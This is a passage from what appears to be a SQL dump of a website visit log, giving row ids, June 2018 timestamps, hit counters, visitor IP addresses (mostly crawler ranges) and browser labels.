,0,0,'54.36.148.164','other'),(256891,1528489832,1,1,0,0,'54.36.148.29','other'),(256892,1528489841,1,1,0,0,'46.211.108.38','chrome'),(256893,1528489882,1,1,0,0,'54.36.148.85','other'),(256894,1528490085,1,1,0,0,'54.36.149.16','other'),(256895,1528490666,1,1,0,0,'141.8.142.74','other'),(256896,1528490749,1,1,0,0,'54.36.149.74','other'),(256897,1528490994,1,1,0,0,'54.36.149.45','other'),(256898,1528491098,1,1,0,0,'54.36.148.70','other'),(256899,1528491176,1,1,0,0,'54.36.148.208','other'),(256900,1528491329,1,1,0,0,'54.36.148.109','other'),(256901,1528491358,1,1,0,0,'54.36.148.110','other'),(256902,1528491468,1,1,0,0,'54.36.149.66','other'),(256903,1528491773,1,1,0,0,'8.29.198.26','other'),(256904,1528491804,1,1,0,0,'54.36.148.47','other'),(256905,1528492507,1,1,0,0,'54.36.148.79','other'),(256906,1528492574,1,1,0,0,'54.36.149.17','other'),(256907,1528492592,1,1,0,0,'54.36.148.222','other'),(256908,1528492714,1,1,0,0,'54.36.148.80','other'),(256909,1528492769,1,1,0,0,'54.36.149.85','other'),(256910,1528492904,1,1,0,0,'54.36.148.252','other'),(256911,1528493217,1,1,0,0,'141.8.142.74','other'),(256912,1528493334,1,1,0,0,'54.36.148.75','other'),(256913,1528493395,1,1,0,0,'54.36.148.206','other'),(256914,1528493399,1,1,0,0,'54.36.148.13','other'),(256915,1528493436,1,1,0,0,'54.36.148.208','other'),(256916,1528493442,1,1,0,0,'54.36.148.173','other'),(256917,1528493555,1,1,0,0,'54.36.148.39','other'),(256918,1528493593,1,1,0,0,'54.36.148.237','other'),(256919,1528493627,1,1,0,0,'54.36.149.48','other'),(256920,1528493644,1,1,0,0,'216.244.66.241','other'),(256921,1528493668,1,1,0,0,'54.36.148.160','other'),(256922,1528493835,1,1,0,0,'54.36.148.251','other'),(256923,1528493876,1,1,0,0,'54.36.149.62','other'),(256924,1528493969,1,1,0,0,'54.36.148.34','other'),(256925,1528493990,1,1,0,0,'13.57.220.0','chrome'),(256926,1528493997,1,1,0,0,'54.36.148.59','other'),(256927,1528494217,1,1,0,0,'54.36.148.74','other'),(256928,1528494240,1,1,0,0,'54.36.148.226','other'),(256929,1528494325,1,1,0,0,'54.36.148.18','other'),(256930,1528494533,1,1,0,0,'54.36.148.96','other'),(256931,1528495003,1,1,0,0,'54.36.149.78','other'),(256932,1528495329,1,1,0,0,'54.36.149.82','other'),(256933,1528495471,1,1,0,0,'54.36.148.153','other'),(256934,1528495552,1,1,0,0,'54.36.149.98','other'),(256935,1528496149,1,1,0,0,'141.8.142.74','other'),(256936,1528496365,1,1,0,0,'54.36.148.231','other'),(256937,1528496738,1,1,0,0,'54.36.149.36','other'),(256938,1528496882,1,1,0,0,'54.36.149.70','other'),(256939,1528496883,1,1,0,0,'37.9.113.182','other'),(256940,1528496925,1,1,0,0,'54.36.148.243','other'),(256941,1528497059,1,1,0,0,'54.36.148.119','other'),(256942,1528497093,1,1,0,0,'54.36.148.235','other'),(256943,1528497211,1,1,0,0,'54.36.149.92','other'),(256944,1528497214,1,1,0,0,'54.36.148.105','other'),(256945,1528497349,1,1,0,0,'54.36.148.164','other'),(256946,1528497382,1,1,0,0,'8.29.198.26','other'),(256947,1528497721,1,1,0,0,'54.36.148.144','other'),(256948,1528497905,2,2,0,0,'141.8.142.74','other'),(256949,1528497976,1,1,0,0,'54.36.148.137','other'),(256950,1528498214,1,1,0,0,'188.255.16.241','msie'),(256951,1528498362,1,1,0,0,'54.36.148.107','other'),(256952,1528498366,1,1,0,0,'54.36.148.251','other'),(256953,1528498442,1,1,0,0,'54.36.148.226','other'),(256954,1528498584,1,1,0,0,'95.163.255.6','other'),(256955,1528498590,1,1,0,0,'54.36.149.36','other'),(256956,1528498677,1,1,0,0,'54.36.149.78','other'),(256957,1528498747,1,1,0,0,'54.36.149.4','other'),(256958,1528498939,1,1,0,0,'54.36.149.5','other'),(256959,1528499112,1,1,0,0,'54.36.148.238','other'),(256960,1528499124,1,1,0,0,'54.36.148.131','other'),(256961,1528499162,1,1,0,0,'54.36.148.62','other'),(256962,1528499424,1,1,0,0,'54.36.148.255','other'),(256963,1528499524,1,1,0,0,'54.36.148.74','other'),(256964,1528499680,1,1,0,0,'54.36.149.80','other'),(256965,1528499733,1,0,1,0,'66.249.66.76',''),(256966,1528499796,1,1,0,0,'54.36.148.20','other'),(256967,1528499797,1,1,0,0,'54.36.148.243','other'),(256968,1528499914,1,1,0,0,'54.36.148.174','other'),(256969,1528500161,1,1,0,0,'95.163.255.6','other'),(256970,1528500411,1,1,0,0,'54.36.149.106','other'),(256971,1528500867,1,1,0,0,'54.36.148.75','other'),(256972,1528501965,1,1,0,0,'66.249.66.157','chrome'),(256973,1528502132,1,1,0,0,'54.36.148.63','other'),(256974,1528502421,1,1,0,0,'180.76.15.16','other'),(256975,1528502572,1,1,0,0,'157.55.39.246','other'),(256976,1528502619,1,1,0,0,'8.29.198.25','other'),(256977,1528502877,1,1,0,0,'54.36.148.30','other'),(256978,1528502990,1,1,0,0,'193.106.30.99','firefox'),(256979,1528503015,1,1,0,0,'54.36.148.223','other'),(256980,1528503058,1,1,0,0,'54.36.148.136','other'),(256981,1528503282,1,1,0,0,'54.36.149.14','other'),(256982,1528503287,1,1,0,0,'54.36.148.10','other'),(256983,1528503305,1,1,0,0,'54.36.148.26','other'),(256984,1528503358,1,1,0,0,'54.36.148.186','other'),(256985,1528503378,1,1,0,0,'54.36.149.96','other'),(256986,1528503776,1,1,0,0,'54.36.148.53','other'),(256987,1528503794,1,1,0,0,'54.36.148.33','other'),(256988,1528503828,1,1,0,0,'54.36.148.250','other'),(256989,1528503874,1,1,0,0,'54.36.148.18','other'),(256990,1528504084,1,1,0,0,'54.36.148.48','other'),(256991,1528504298,1,1,0,0,'54.36.149.83','other'),(256992,1528504640,1,1,0,0,'54.36.148.154','other'),(256993,1528504729,1,1,0,0,'54.36.149.95','other'),(256994,1528505378,1,1,0,0,'180.76.15.12','other'),(256995,1528505403,1,1,0,0,'54.36.149.28','other'),(256996,1528505750,1,1,0,0,'207.46.13.113','other'),(256997,1528505990,1,1,0,0,'54.36.149.62','other'),(256998,1528506218,1,1,0,0,'141.8.142.74','other'),(256999,1528506552,1,1,0,0,'54.36.148.31','other'),(257000,1528506874,1,1,0,0,'54.36.148.255','other'),(257001,1528506883,1,1,0,0,'54.36.149.54','other'),(257002,1528506952,1,1,0,0,'216.244.66.241','other'),(257003,1528507202,1,1,0,0,'54.36.148.214','other'),(257004,1528507285,1,1,0,0,'95.163.255.19','other'),(257005,1528507347,1,1,0,0,'54.36.148.147','other'),(257006,1528507409,1,1,0,0,'54.36.148.52','other'),(257007,1528507460,1,1,0,0,'54.36.148.127','other'),(257008,1528507524,1,1,0,0,'54.36.148.172','other'),(257009,1528507530,1,1,0,0,'54.36.148.187','other'),(257010,1528507577,1,0,1,0,'66.249.66.157',''),(257011,1528507730,1,1,0,0,'193.106.30.99','firefox'),(257012,1528507731,2,2,0,0,'178.154.171.88','other'),(257013,1528507949,1,1,0,0,'54.36.148.102','other'),(257014,1528508202,1,1,0,0,'8.29.198.27','other'),(257015,1528508446,1,1,0,0,'54.36.148.112','other'),(257016,1528508543,1,1,0,0,'54.36.148.17','other'),(257017,1528508586,1,1,0,0,'54.36.148.89','other'),(257018,1528508860,1,1,0,0,'54.36.148.239','other'),(257019,1528508991,1,1,0,0,'54.36.148.40','other'),(257020,1528509231,1,1,0,0,'54.36.149.102','other'),(257021,1528509260,1,1,0,0,'54.36.149.82','other'),(257022,1528509335,1,1,0,0,'54.36.149.25','other'),(257023,1528509549,1,1,0,0,'54.36.148.164','other'),(257024,1528509607,1,1,0,0,'207.46.13.113','other'),(257025,1528509689,1,1,0,0,'54.36.148.189','other'),(257026,1528509910,1,1,0,0,'54.36.148.223','other'),(257027,1528509920,1,1,0,0,'54.36.149.43','other'),(257028,1528509957,1,1,0,0,'54.36.148.122','other'),(257029,1528510060,1,1,0,0,'54.36.149.3','other'),(257030,1528510079,1,1,0,0,'54.36.149.14','other'),(257031,1528510260,1,1,0,0,'54.36.148.174','other'),(257032,1528510304,1,0,1,0,'66.249.66.155',''),(257033,1528510483,1,1,0,0,'54.36.148.158','other'),(257034,1528510670,1,0,1,0,'66.249.66.156',''),(257035,1528510728,46,46,0,0,'54.37.233.96','other'),(257036,1528510826,1,1,0,0,'54.36.149.35','other'),(257037,1528510892,1,1,0,0,'54.36.148.89','other'),(257038,1528510912,1,1,0,0,'54.36.148.215','other'),(257039,1528510948,1,1,0,0,'54.36.148.133','other'),(257040,1528511125,1,1,0,0,'54.36.148.251','other'),(257041,1528511453,1,0,1,0,'66.249.66.76',''),(257042,1528511637,1,1,0,0,'54.36.148.132','other'),(257043,1528511650,1,1,0,0,'54.36.148.26','other'),(257044,1528511735,1,1,0,0,'54.36.148.248','other'),(257045,1528511915,1,1,0,0,'54.36.148.228','other'),(257046,1528512046,1,1,0,0,'157.55.39.246','other'),(257047,1528512170,1,1,0,0,'54.36.149.47','other'),(257048,1528512540,1,1,0,0,'54.36.148.39','other'),(257049,1528512598,1,1,0,0,'54.36.148.16','other'),(257050,1528512985,1,1,0,0,'54.36.148.50','other'),(257051,1528513077,1,1,0,0,'54.36.148.34','other'),(257052,1528513363,1,1,0,0,'54.36.148.106','other'),(257053,1528513448,1,1,0,0,'8.29.198.25','other'),(257054,1528513495,1,1,0,0,'54.36.149.40','other'),(257055,1528513677,1,1,0,0,'54.36.148.22','other'),(257056,1528513841,1,1,0,0,'54.36.148.129','other'),(257057,1528514323,1,1,0,0,'54.36.148.221','other'),(257058,1528514928,1,1,0,0,'54.36.148.116','other'),(257059,1528515329,1,0,1,0,'66.249.66.157',''),(257060,1528515371,1,1,0,0,'54.36.148.172','other'),(257061,1528515565,1,1,0,0,'54.36.148.203','other'),(257062,1528515608,1,1,0,0,'54.36.149.20','other'),(257063,1528516231,1,1,0,0,'54.36.148.119','other'),(257064,1528516384,1,1,0,0,'54.36.149.19','other'),(257065,1528516390,1,1,0,0,'54.36.148.71','other'),(257066,1528516404,1,1,0,0,'141.8.142.74','other'),(257067,1528516427,1,1,0,0,'54.36.148.179','other'),(257068,1528516578,1,1,0,0,'54.36.149.79','other'),(257069,1528516634,1,1,0,0,'54.36.149.38','other'),(257070,1528516717,1,1,0,0,'54.36.148.101','other'),(257071,1528516731,1,1,0,0,'54.36.149.66','other'),(257072,1528517019,1,1,0,0,'54.36.148.132','other'),(257073,1528517031,1,1,0,0,'54.36.148.165','other'),(257074,1528517032,1,1,0,0,'54.36.148.192','other'),(257075,1528517328,1,1,0,0,'54.36.148.104','other'),(257076,1528517518,2,2,0,0,'54.36.148.179','other'),(257077,1528517776,1,1,0,0,'54.36.148.254','other'),(257078,1528518094,1,1,0,0,'54.36.149.47','other'),(257079,1528518185,1,1,0,0,'54.36.149.38','other'),(257080,1528518191,1,1,0,0,'157.55.39.246','other'),(257081,1528518277,1,1,0,0,'54.36.149.71','other'),(257082,1528518366,1,1,0,0,'54.36.149.67','other'),(257083,1528518376,1,1,0,0,'54.36.148.63','other'),(257084,1528518936,1,1,0,0,'54.36.149.26','other'),(257085,1528519038,1,1,0,0,'8.29.198.27','other'),(257086,1528519050,1,1,0,0,'54.36.148.115','other'),(257087,1528519110,1,1,0,0,'54.36.148.126','other'),(257088,1528519372,1,1,0,0,'54.36.148.182','other'),(257089,1528520052,1,1,0,0,'54.36.148.15','other'),(257090,1528520074,1,1,0,0,'162.210.196.98','other'),(257091,1528521096,1,1,0,0,'54.36.149.99','other'),(257092,1528521132,1,1,0,0,'54.36.148.181','other'),(257093,1528521303,1,1,0,0,'54.36.148.132','other'),(257094,1528521356,1,1,0,0,'54.36.148.106','other'),(257095,1528521422,1,1,0,0,'54.36.148.196','other'),(257096,1528521517,1,1,0,0,'54.36.149.95','other'),(257097,1528521854,1,1,0,0,'54.36.148.235','other'),(257098,1528521964,1,1,0,0,'40.77.167.56','other'),(257099,1528522014,1,1,0,0,'54.36.148.123','other'),(257100,1528522338,1,1,0,0,'54.36.149.73','other'),(257101,1528522432,1,1,0,0,'54.36.148.21','other'),(257102,1528522436,1,1,0,0,'54.36.148.68','other'),(257103,1528523110,1,1,0,0,'54.36.148.184','other'),(257104,1528523133,1,1,0,0,'54.36.148.29','other'),(257105,1528523214,1,1,0,0,'54.36.148.191','other'),(257106,1528523329,1,1,0,0,'54.36.148.137','other'),(257107,1528523575,1,1,0,0,'54.36.149.82','other'),(257108,1528523780,1,1,0,0,'54.36.149.3','other'),(257109,1528523855,1,1,0,0,'54.36.148.215','other'),(257110,1528523856,1,1,0,0,'54.36.149.61','other'),(257111,1528523999,1,1,0,0,'54.36.149.77','other'),(257112,1528524070,1,1,0,0,'54.36.148.235','other'),(257113,1528524180,1,1,0,0,'216.244.66.241','other'),(257114,1528524278,1,1,0,0,'8.29.198.26','other'),(257115,1528524483,1,1,0,0,'54.36.148.224','other'),(257116,1528524832,1,1,0,0,'188.230.43.254','other'),(257117,1528525001,1,1,0,0,'54.36.149.61','other'),(257118,1528525099,1,1,0,0,'54.36.148.198','other'),(257119,1528525164,1,1,0,0,'54.36.149.50','other'),(257120,1528525445,1,1,0,0,'54.36.149.44','other'),(257121,1528525567,1,1,0,0,'54.36.148.84','other'),(257122,1528525689,1,1,0,0,'54.36.148.244','other'),(257123,1528525822,1,1,0,0,'54.36.149.37','other'),(257124,1528525986,1,1,0,0,'54.36.149.25','other'),(257125,1528526150,1,1,0,0,'54.36.149.76','other'),(257126,1528526211,1,1,0,0,'54.36.148.125','other'),(257127,1528526354,1,1,0,0,'54.36.149.64','other'),(257128,1528526424,1,1,0,0,'54.36.148.170','other'),(257129,1528526474,1,1,0,0,'54.36.148.66','other'),(257130,1528526736,1,1,0,0,'54.36.148.206','other'),(257131,1528526764,1,1,0,0,'54.36.148.178','other'),(257132,1528527230,1,1,0,0,'188.230.43.254','other'),(257133,1528527479,1,1,0,0,'54.36.148.35','other'),(257134,1528528042,1,1,0,0,'54.36.148.25','other'),(257135,1528528198,1,1,0,0,'54.36.149.16','other'),(257136,1528528346,1,1,0,0,'54.36.148.214','other'),(257137,1528528402,1,1,0,0,'54.36.148.118','other'),(257138,1528528496,1,1,0,0,'54.36.148.235','other'),(257139,1528528648,1,1,0,0,'54.36.149.94','other'),(257140,1528528672,1,1,0,0,'54.36.148.85','other'),(257141,1528528969,1,1,0,0,'54.36.148.173','other'),(257142,1528529182,1,1,0,0,'54.36.149.23','other'),(257143,1528529324,1,1,0,0,'54.36.148.101','other'),(257144,1528529337,1,1,0,0,'54.36.148.192','other'),(257145,1528529371,1,1,0,0,'54.36.148.169','other'),(257146,1528529628,1,1,0,0,'188.230.43.254','other'),(257147,1528529635,1,1,0,0,'54.36.149.6','other'),(257148,1528529677,1,1,0,0,'54.36.148.54','other'),(257149,1528529693,1,1,0,0,'95.163.255.7','other'),(257150,1528529871,1,1,0,0,'8.29.198.27','other'),(257151,1528529915,1,1,0,0,'95.163.255.93','other'),(257152,1528530226,1,1,0,0,'95.163.255.99','other'),(257153,1528530324,1,0,1,0,'66.249.66.155',''),(257154,1528531003,1,1,0,0,'54.36.148.245','other'),(257155,1528531283,1,1,0,0,'54.36.148.140','other'),(257156,1528531404,2,2,0,0,'54.36.149.65','other'),(257157,1528531492,1,1,0,0,'54.36.149.20','other'),(257158,1528531503,1,1,0,0,'54.36.149.48','other'),(257159,1528531731,1,1,0,0,'54.36.148.255','other'),(257160,1528531826,1,1,0,0,'54.36.148.251','other'),(257161,1528531923,1,1,0,0,'54.36.148.97','other'),(257162,1528532175,1,1,0,0,'54.36.148.239','other'),(257163,1528532469,2,2,0,0,'84.189.17.220','other'),(257164,1528532662,1,1,0,0,'54.36.148.225','other'),(257165,1528532908,1,1,0,0,'54.36.148.14','other'),(257166,1528532963,1,1,0,0,'54.36.148.139','other'),(257167,1528533084,1,1,0,0,'66.249.66.155','chrome'),(257168,1528533249,1,1,0,0,'54.36.148.158','other'),(257169,1528533417,1,1,0,0,'193.106.30.99','firefox'),(257170,1528533801,1,1,0,0,'54.36.149.99','other'),(257171,1528533833,1,1,0,0,'54.36.149.73','other'),(257172,1528533922,1,1,0,0,'141.8.142.74','other'),(257173,1528533981,1,1,0,0,'54.36.149.18','other'),(257174,1528534224,1,1,0,0,'54.36.149.78','other'),(257175,1528534446,1,1,0,0,'54.36.149.15','other'),(257176,1528534563,1,1,0,0,'54.36.148.133','other'),(257177,1528534608,1,1,0,0,'54.36.149.98','other'),(257178,1528534644,1,1,0,0,'54.36.148.15','other'),(257179,1528534897,1,1,0,0,'54.36.148.214','other'),(257180,1528534928,1,1,0,0,'54.36.149.81','other'),(257181,1528535108,1,1,0,0,'8.29.198.27','other'),(257182,1528535127,1,1,0,0,'54.36.148.209','other'),(257183,1528535201,1,1,0,0,'54.36.148.199','other'),(257184,1528535266,1,1,0,0,'144.76.166.14','other'),(257185,1528535362,1,1,0,0,'54.36.148.123','other'),(257186,1528535511,1,1,0,0,'54.36.148.23','other'),(257187,1528535580,1,1,0,0,'54.36.148.201','other'),(257188,1528536285,1,1,0,0,'216.244.66.241','other'),(257189,1528536310,1,1,0,0,'54.36.149.97','other'),(257190,1528536632,1,1,0,0,'54.36.149.25','other'),(257191,1528536737,1,1,0,0,'54.36.148.131','other'),(257192,1528536793,1,0,1,0,'66.249.66.155',''),(257193,1528536879,1,1,0,0,'213.174.29.5','firefox'),(257194,1528536949,1,1,0,0,'54.36.148.129','other'),(257195,1528537010,1,1,0,0,'54.36.148.177','other'),(257196,1528537037,1,1,0,0,'54.36.149.96','other'),(257197,1528537182,1,1,0,0,'54.36.148.104','other'),(257198,1528537236,1,1,0,0,'157.55.39.233','other'),(257199,1528537241,1,1,0,0,'54.36.149.46','other'),(257200,1528537581,3,3,0,0,'141.8.142.74','other'),(257201,1528537610,1,1,0,0,'216.244.66.241','other'),(257202,1528537620,1,1,0,0,'95.163.255.16','other'),(257203,1528537646,1,1,0,0,'54.36.148.207','other'),(257204,1528538148,1,0,1,0,'66.249.66.75',''),(257205,1528538302,1,1,0,0,'54.36.148.74','other'),(257206,1528538558,1,1,0,0,'54.36.148.126','other'),(257207,1528538648,1,1,0,0,'54.36.148.48','other'),(257208,1528538969,1,0,1,0,'66.249.66.155',''),(257209,1528539116,1,1,0,0,'54.36.149.7','other'),(257210,1528539196,1,1,0,0,'54.36.148.50','other'),(257211,1528539506,1,1,0,0,'54.36.148.105','other'),(257212,1528539609,1,1,0,0,'54.36.148.110','other'),(257213,1528539654,1,1,0,0,'54.36.148.230','other'),(257214,1528539709,1,1,0,0,'54.36.148.96','other'),(257215,1528540064,1,1,0,0,'54.36.148.132','other'),(257216,1528540392,1,1,0,0,'54.36.149.29','other'),(257217,1528540535,1,1,0,0,'54.36.148.61','other'),(257218,1528540702,1,1,0,0,'8.29.198.25','other'),(257219,1528541237,1,1,0,0,'54.36.148.29','other'),(257220,1528541912,1,1,0,0,'54.36.149.81','other'),(257221,1528542076,1,1,0,0,'54.36.148.148','other'),(257222,1528542281,1,1,0,0,'141.8.142.74','other'),(257223,1528542354,1,1,0,0,'54.36.148.190','other'),(257224,1528542679,1,1,0,0,'54.36.148.235','other'),(257225,1528542974,1,1,0,0,'54.36.148.147','other'),(257226,1528543036,1,1,0,0,'54.36.148.98','other'),(257227,1528543040,1,1,0,0,'54.36.148.56','other'),(257228,1528543399,1,1,0,0,'54.36.148.123','other'),(257229,1528543861,1,1,0,0,'54.36.148.130','other'),(257230,1528543938,1,1,0,0,'54.36.148.15','other'),(257231,1528544097,1,1,0,0,'54.36.148.96','other'),(257232,1528544149,1,1,0,0,'54.36.149.49','other'),(257233,1528544193,1,1,0,0,'216.244.66.241','other'),(257234,1528544412,1,1,0,0,'54.36.148.67','other'),(257235,1528544470,2,2,0,0,'178.154.171.88','other'),(257236,1528544511,1,1,0,0,'54.36.148.116','other'),(257237,1528544689,1,1,0,0,'54.36.148.214','other'),(257238,1528544697,1,1,0,0,'54.36.148.103','other'),(257239,1528544766,1,1,0,0,'66.249.66.157','chrome'),(257240,1528545297,1,1,0,0,'157.55.39.192','other'),(257241,1528545369,1,1,0,0,'54.36.149.22','other'),(257242,1528545734,1,1,0,0,'54.36.148.215','other'),(257243,1528545917,1,1,0,0,'51.15.49.119','other'),(257244,1528545945,1,1,0,0,'54.36.149.90','other'),(257245,1528545948,1,1,0,0,'8.29.198.25','other'),(257246,1528545993,1,1,0,0,'54.36.148.57','other'),(257247,1528546217,1,1,0,0,'54.36.149.56','other'),(257248,1528547273,1,1,0,0,'54.36.148.202','other'),(257249,1528547303,1,1,0,0,'54.36.148.71','other'),(257250,1528547560,1,1,0,0,'54.36.148.12','other'),(257251,1528547688,1,1,0,0,'54.36.149.77','other'),(257252,1528547694,1,1,0,0,'54.36.148.23','other'),(257253,1528547874,1,1,0,0,'54.36.149.97','other'),(257254,1528547914,1,1,0,0,'54.36.148.238','other'),(257255,1528548320,1,1,0,0,'54.36.148.100','other'),(257256,1528548456,1,1,0,0,'95.163.255.112','other'),(257257,1528548467,1,1,0,0,'95.163.255.104','other'),(257258,1528548741,1,1,0,0,'54.36.149.2','other'),(257259,1528549278,1,1,0,0,'54.36.148.12','other'),(257260,1528549378,1,1,0,0,'54.36.148.139','other'),(257261,1528549443,1,1,0,0,'54.36.148.120','other'),(257262,1528549462,1,1,0,0,'54.36.148.183','other'),(257263,1528549509,1,1,0,0,'216.244.66.241','other'),(257264,1528549640,1,1,0,0,'54.36.148.49','other'),(257265,1528549737,1,1,0,0,'54.36.148.10','other'),(257266,1528549808,1,1,0,0,'91.209.11.236','other'),(257267,1528549817,1,1,0,0,'157.55.39.230','other'),(257268,1528549951,1,1,0,0,'141.8.142.74','other'),(257269,1528550285,1,1,0,0,'37.204.76.241','msie'),(257270,1528550383,1,1,0,0,'54.36.148.151','other'),(257271,1528550463,1,1,0,0,'54.36.148.174','other'),(257272,1528550504,1,1,0,0,'54.36.148.96','other'),(257273,1528550550,1,1,0,0,'54.36.148.54','other'),(257274,1528550805,1,1,0,0,'54.36.148.82','other'),(257275,1528551197,1,1,0,0,'54.36.148.255','other'),(257276,1528551249,2,2,0,0,'178.154.171.88','other'),(257277,1528551269,1,1,0,0,'54.36.148.163','other'),(257278,1528551393,1,1,0,0,'54.36.148.178','other'),(257279,1528551402,1,1,0,0,'54.36.148.244','other'),(257280,1528551462,1,1,0,0,'54.36.149.6','other'),(257281,1528551524,1,1,0,0,'54.36.148.104','other'),(257282,1528551534,1,1,0,0,'8.29.198.27','other'),(257283,1528551613,1,1,0,0,'54.36.148.152','other'),(257284,1528551706,1,1,0,0,'54.36.148.187','other'),(257285,1528551758,1,1,0,0,'141.8.142.74','other'),(257286,1528551853,1,1,0,0,'54.36.149.41','other'),(257287,1528552095,2,2,0,0,'54.36.148.99','other'),(257288,1528552331,1,1,0,0,'54.36.148.89','other'),(257289,1528552345,1,1,0,0,'54.36.148.87','other'),(257290,1528552484,1,1,0,0,'54.36.149.54','other'),(257291,1528552929,1,1,0,0,'54.36.148.240','other'),(257292,1528553304,1,1,0,0,'54.36.148.134','other'),(257293,1528553568,1,1,0,0,'54.36.148.179','other'),(257294,1528553762,1,1,0,0,'54.36.148.116','other'),(257295,1528553781,1,1,0,0,'54.36.148.84','other'),(257296,1528554456,1,1,0,0,'54.36.148.150','other'),(257297,1528554490,1,1,0,0,'54.36.149.26','other'),(257298,1528554497,1,1,0,0,'157.55.39.230','other'),(257299,1528554541,1,1,0,0,'54.36.149.79','other'),(257300,1528554744,1,1,0,0,'157.55.39.231','other'),(257301,1528555214,1,1,0,0,'54.36.148.15','other'),(257302,1528555563,1,1,0,0,'54.36.149.83','other'),(257303,1528555695,1,1,0,0,'54.36.148.249','other'),(257304,1528555766,1,1,0,0,'54.36.148.58','other'),(257305,1528555795,1,1,0,0,'157.55.39.230','other'),(257306,1528555808,1,1,0,0,'54.36.148.148','other'),(257307,1528556157,1,1,0,0,'54.36.149.1','other'),(257308,1528556556,1,1,0,0,'54.36.148.63','other'),(257309,1528556790,1,1,0,0,'8.29.198.26','other'),(257310,1528556926,1,1,0,0,'54.36.148.216','other'),(257311,1528557131,1,1,0,0,'54.36.148.131','other'),(257312,1528557145,1,1,0,0,'54.36.148.251','other'),(257313,1528557153,1,1,0,0,'54.36.148.156','other'),(257314,1528557473,1,1,0,0,'54.36.148.69','other'),(257315,1528557535,1,1,0,0,'54.36.148.233','other'),(257316,1528557590,1,1,0,0,'54.36.149.17','other'),(257317,1528557681,1,1,0,0,'54.36.148.167','other'),(257318,1528558795,1,1,0,0,'54.36.148.71','other'),(257319,1528558853,1,1,0,0,'54.36.148.243','other'),(257320,1528558911,1,1,0,0,'54.36.149.65','other'),(257321,1528558950,1,1,0,0,'47.96.234.252','other'),(257322,1528559406,1,1,0,0,'54.36.149.48','other'),(257323,1528559636,1,1,0,0,'216.244.66.241','other'),(257324,1528560051,2,2,0,0,'54.36.148.34','other'),(257325,1528560400,1,1,0,0,'54.36.148.152','other'),(257326,1528560511,1,1,0,0,'54.36.148.215','other'),(257327,1528560594,1,1,0,0,'54.36.148.64','other'),(257328,1528560657,1,1,0,0,'188.32.41.32','msie'),(257329,1528560796,1,1,0,0,'54.36.148.16','other'),(257330,1528561081,1,1,0,0,'54.36.148.103','other'),(257331,1528561111,1,1,0,0,'54.36.148.173','other'),(257332,1528561201,1,1,0,0,'157.55.39.231','other'),(257333,1528561248,1,1,0,0,'54.36.148.184','other'),(257334,1528561278,1,1,0,0,'54.36.149.96','other'),(257335,1528561319,1,1,0,0,'54.36.149.52','other'),(257336,1528561607,1,1,0,0,'54.36.148.52','other'),(257337,1528561670,1,1,0,0,'54.36.148.102','other'),(257338,1528561683,1,1,0,0,'54.36.149.18','other'),(257339,1528561717,1,1,0,0,'54.36.148.18','other'),(257340,1528562117,1,1,0,0,'178.154.171.88','other'),(257341,1528562131,1,1,0,0,'54.36.148.31','other'),(257342,1528562137,1,1,0,0,'54.36.148.157','other'),(257343,1528562200,1,0,1,0,'66.249.66.157',''),(257344,1528562365,1,1,0,0,'8.29.198.25','other'),(257345,1528562455,1,1,0,0,'54.36.148.205','other'),(257346,1528562561,1,1,0,0,'80.82.70.116','chrome'),(257347,1528562703,1,1,0,0,'54.36.148.241','other'),(257348,1528562839,1,1,0,0,'54.36.148.161','other'),(257349,1528562989,1,1,0,0,'54.36.148.24','other'),(257350,1528563726,1,1,0,0,'54.36.148.53','other'),(257351,1528563799,1,1,0,0,'54.36.148.201','other'),(257352,1528563919,1,1,0,0,'54.36.148.224','other'),(257353,1528563952,1,1,0,0,'54.36.149.70','other'),(257354,1528564043,1,1,0,0,'54.36.148.222','other'),(257355,1528564201,1,1,0,0,'192.162.35.81','firefox'),(257356,1528564403,2,2,0,0,'54.36.148.194','other'),(257357,1528564544,1,1,0,0,'54.36.149.25','other'),(257358,1528564965,1,1,0,0,'95.163.255.19','other'),(257359,1528564983,1,1,0,0,'54.36.148.54','other'),(257360,1528565276,1,1,0,0,'54.36.148.165','other'),(257361,1528565363,1,1,0,0,'216.244.66.241','other'),(257362,1528565603,1,1,0,0,'54.36.148.176','other'),(257363,1528565808,1,1,0,0,'66.102.9.38','chrome'),(257364,1528565897,1,1,0,0,'54.36.148.200','other'),(257365,1528565964,1,1,0,0,'54.36.148.116','other'),(257366,1528566095,1,1,0,0,'178.154.171.88','other'),(257367,1528566175,1,1,0,0,'54.36.149.54','other'),(257368,1528566253,1,1,0,0,'54.36.149.37','other'),(257369,1528566762,1,1,0,0,'54.36.148.11','other'),(257370,1528566827,1,1,0,0,'54.36.148.182','other'),(257371,1528566887,1,1,0,0,'54.36.149.41','other'),(257372,1528567091,1,1,0,0,'54.36.148.211','other'),(257373,1528567130,1,1,0,0,'54.36.148.25','other'),(257374,1528567260,1,1,0,0,'180.76.15.160','other'),(257375,1528567607,1,1,0,0,'178.154.171.88','other'),(257376,1528567627,1,1,0,0,'8.29.198.27','other'),(257377,1528567676,2,2,0,0,'91.196.178.38','chrome'),(257378,1528567869,1,1,0,0,'46.105.124.55','firefox'),(257379,1528567984,1,1,0,0,'54.36.148.177','other'),(257380,1528567994,1,1,0,0,'87.250.224.46','other'),(257381,1528568099,1,1,0,0,'54.36.149.76','other'),(257382,1528568170,1,1,0,0,'54.36.148.37','other'),(257383,1528568224,1,1,0,0,'54.36.148.155','other'),(257384,1528568472,1,1,0,0,'54.36.149.88','other'),(257385,1528568777,1,1,0,0,'54.36.149.82','other'),(257386,1528568784,1,1,0,0,'54.36.148.201','other'),(257387,1528568974,1,1,0,0,'54.36.148.147','other'),(257388,1528569214,1,1,0,0,'54.36.148.112','other'),(257389,1528569350,1,1,0,0,'54.36.149.44','other'),(257390,1528569927,1,1,0,0,'157.55.39.233','other'),(257391,1528569953,1,1,0,0,'141.8.142.74','other'),(257392,1528570045,1,1,0,0,'54.36.148.230','other'),(257393,1528570104,1,1,0,0,'54.36.148.82','other'),(257394,1528570487,1,1,0,0,'163.172.4.153','chrome'),(257395,1528570757,1,1,0,0,'54.36.148.209','other'),(257396,1528571045,1,1,0,0,'77.111.247.69','chrome'),(257397,1528571103,1,1,0,0,'54.36.149.92','other'),(257398,1528571125,1,1,0,0,'54.36.148.210','other'),(257399,1528571153,1,1,0,0,'54.36.148.227','other'),(257400,1528571316,1,1,0,0,'54.36.148.73','other'),(257401,1528571333,1,1,0,0,'141.8.142.74','other'),(257402,1528571462,1,1,0,0,'54.36.148.24','other'),(257403,1528571463,1,1,0,0,'54.36.149.79','other'),(257404,1528571586,1,1,0,0,'54.36.149.102','other'),(257405,1528571753,1,1,0,0,'54.36.148.41','other'),(257406,1528571775,1,1,0,0,'54.36.148.